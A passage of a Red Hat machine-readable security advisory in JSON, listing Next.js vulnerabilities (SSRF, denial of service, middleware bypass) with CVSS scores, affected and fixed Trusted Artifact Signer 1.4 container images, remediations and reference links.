"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44578"
},
{
"category": "external",
"summary": "RHBZ#2477187",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477187"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44578"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r"
}
],
"release_date": "2026-05-13T17:01:38.942000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests"
},
{
"cve": "CVE-2026-44579",
"cwe": {
"id": "CWE-833",
"name": "Deadlock"
},
"discovery_date": "2026-05-13T18:01:32.406247+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477193"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Applications utilizing Partial Prerendering via the Cache Components feature are susceptible to connection exhaustion. A remote attacker can send crafted POST requests to a server action, triggering a request-body handling deadlock. This leaves connections open, consuming server resources and ultimately leading to a Denial of Service (DoS) for legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Denial of Service via crafted POST requests to server actions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as Important as Next.js applications configured with Partial Prerendering and Cache Components are susceptible to a remote denial of service. An unauthenticated attacker can exhaust server connections by sending specially crafted POST requests, leading to a complete disruption of service for legitimate users. This impact is significant due to the potential for widespread unavailability of affected web applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44579"
},
{
"category": "external",
"summary": "RHBZ#2477193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44579"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx"
}
],
"release_date": "2026-05-13T17:04:28.388000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Denial of Service via crafted POST requests to server actions"
},
{
"cve": "CVE-2026-45109",
"cwe": {
"id": "CWE-358",
"name": "Improperly Implemented Security Check for Standard"
},
"discovery_date": "2026-05-13T18:01:23.402405+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477190"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. A remote unauthenticated attacker could exploit a bypass in a security fix when using middleware.ts with Turbopack. This vulnerability could lead to the disclosure of sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Information disclosure via security fix bypass in middleware with Turbopack",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important information disclosure flaw in Next.js allows a remote unauthenticated attacker to bypass a prior security fix when applications utilize `middleware.ts` with Turbopack. This bypass undermines intended access controls, potentially leading to the exposure of sensitive information in affected Red Hat AMQ and Red Hat Trusted Artifact Signer deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45109"
},
{
"category": "external",
"summary": "RHBZ#2477190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477190"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45109",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45109"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45109",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45109"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6"
}
],
"release_date": "2026-05-13T17:11:07.275000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
